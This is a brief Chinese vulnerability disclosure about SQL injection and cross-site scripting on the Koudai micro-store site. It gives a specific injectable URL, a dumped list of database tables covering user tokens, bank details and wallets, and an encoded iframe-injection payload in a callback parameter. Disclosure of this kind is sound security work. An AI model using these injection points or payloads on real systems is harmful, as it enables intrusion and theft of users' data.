口袋购物微店注入可获取敏感数据
口袋购物微店站点存在sql注入、跨站等。
注入点:http://wd.koudai.com/vshop/1/H5/H5ShopInfo.php?userid=52&callback=jsonpcallback_1400737639575_8703400159720331&ver=51402
userid存在注入
+-------------------------+ | account_statistics | | account_type | | active | | address | | address_book | | admin_contact | | android_info | | black_list | | bmb_task | | buyer_action | | buyer_identity | | buyer_info | | buyer_note | | buyer_ua | | cate_info | | cate_item | | complaint | | csc_task | | csc_task_process | | custom | | custom_detail | | custom_group | | custom_order | | express_info | | express_note | | express_state_info | | friend_dynamic | | gps | | ios_info | | item_bg_category | | item_info | | item_sku | | item_souce | | login_info | | market_apply | | market_record | | market_seller_item | | market_user | | offer_price | | order_chargeback | | order_desc_info | | order_discount | | order_fr | | order_fr_info | | order_info | | order_pay | | order_refund | | order_status_history | | order_warrant | | pay_batch_no | | pay_commission_batch_no | | pay_commission_note | | pay_detail | | pay_history | | pay_note | | pay_seller_id | | pay_task | | pay_withdrawals_num | | phone_valid | | role_action | | role_info | | seal_off | | sell_summary | | shop_friend | | sms_log | | summary_info | | tb_move_status | | unpay_detail | | unpay_list | | unpay_order | | update_bank_num | | user_action | | user_bank | | user_device | | user_discount | | user_feedback | | user_info | | user_key | | user_token | | user_truename_note | | user_union | | user_union_msg | | user_wallet | | user_wallet_workflow | | web_feedback | | web_notice | | white_list | | wholesale_info | +-------------------------+
另外callback参数也没做好过滤
http://wd.koudai.com/wd/cate/getList?callback=jsonpcallback_1400737646118_061060125241056085%22%27%3E%3C%2Fiframe%3E%3CIFRAME+SRC%3D%22www.baidu.com%22%3E&ver=51402¶m=123
做好过滤
- 上一篇:内网端口转发方法汇总
- 下一篇:wordpress网站SEO代码优化技巧
相关文章
图文推荐
- 文章
- 推荐
- 热门新闻